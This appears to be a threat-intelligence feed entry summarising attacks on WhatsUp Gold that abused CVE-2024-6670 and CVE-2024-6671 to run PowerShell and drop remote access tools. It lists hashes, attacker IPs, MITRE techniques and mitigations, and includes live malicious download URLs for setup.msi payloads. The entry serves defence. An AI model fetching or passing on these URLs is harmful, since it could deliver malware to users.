Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities

Sept. 18, 2024, 9 a.m.

Tags
atera agent
CVE-2024-6670
CVE-2024-6671
2024-09-18
remote access tools
splashtop remote
whatsup gold
radmin
External References
Description

Trend Micro researchers identified remote code execution attacks on WhatsUp Gold exploiting the Active Monitor PowerShell Script since August 30. These attacks possibly leveraged vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16. The timeline suggests that some organizations were unable to apply patches quickly, leading to incidents immediately following the PoC's publication. Attackers abused NmPoller.exe to execute PowerShell scripts, downloading various remote access tools and attempting to gain persistence. Mitigation steps include keeping services under access control, immediate patch application, and monitoring suspicious process creation events in WhatsUp Gold environments.

Date

Published: Sept. 18, 2024, 8:29 a.m.

Created: Sept. 18, 2024, 8:29 a.m.

Modified: Sept. 18, 2024, 9 a.m.

Indicators

f1c68574167eaea826a90595710e7ee1a1e75c95433883ce569a144f116e2bf4

992974377793c2479065358b358bb3788078970dacc7c50b495061ccc4507b90

6daa94a36c8ccb9442f40c81a18b8501aa360559865f211d72a74788a1bbf3ce

185.123.100.160

45.227.255.216

https://fedko.org/wp-includes/ID3/setup.msi

http://45.227.255.216:29742/ddQCz2CkW8/setup.msi

http://185.123.100.160/access/Remote

Download all indicators here!

Attack Patterns

Splashtop Remote

SimpleHelp Remote Access

Radmin

Atera Agent

T1505.003

T1059.001

T1571

T1105

T1543

T1190

T1133

T1078

CVE-2024-6671

CVE-2024-6670

CVE-2024-4885